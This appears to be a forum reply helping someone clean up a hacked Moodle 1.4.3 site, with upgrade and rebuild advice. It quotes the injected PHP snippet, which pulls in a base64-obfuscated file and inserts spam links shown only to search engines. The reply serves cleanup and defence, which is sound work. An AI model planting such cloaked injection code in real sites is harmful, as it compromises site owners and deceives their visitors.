Hi There,
1.4.3 is really old and the site has been hacked - that initial group of lines:
ob_start(); include_once base64_decode("L2hvbWUvbnl0ZWdsb3IvcHVibGljX2h0bWwvc2Nob29sL2xhbmcvdHIvaGVscC9xdWl6L2hlbHBjbGFzcy50eHQ="); $_SERVER["php__ss_ldata"]=ob_get_clean(); ob_start("php__session_end");function php__session_end($php__buffer){if(!eregi("[a-z]",$_SERVER["php__ss_ldata"])) return $php__buffer; if(function_exists("php__register_global")) $php__buffer=php__register_global($php__buffer);return eregi("",$php__buffer)?preg_replace("||i","{$_SERVER["php__ss_ldata"]}",$php__buffer):$php__buffer.$_SERVER["php__ss_ldata"]; }
is trying to put stacks of viagra links on the page (and only for Search engines visiting your site - not for general visitors)
I'd suggest you delete the moodle directory completely and replace it with a copy of Moodle 1.5Stable (this link here should work)
http://download.moodle.org/download.php/stable15/moodle-latest-15.zip
hopefully the upgrade works ok.
then I would try to take individual course backups of each course and build a fresh copy of Moodle (latest 1.9Stable) and then restore each individual course on the new site. - you will probably want your client to check the content, as it's possible the hackers/spammers have modifed the content of your site.
You should also check to make sure none of the other sites on your
server have been compromised. If your server is configured badly - it's possible one of your other sites infected the Moodle install in the first place.
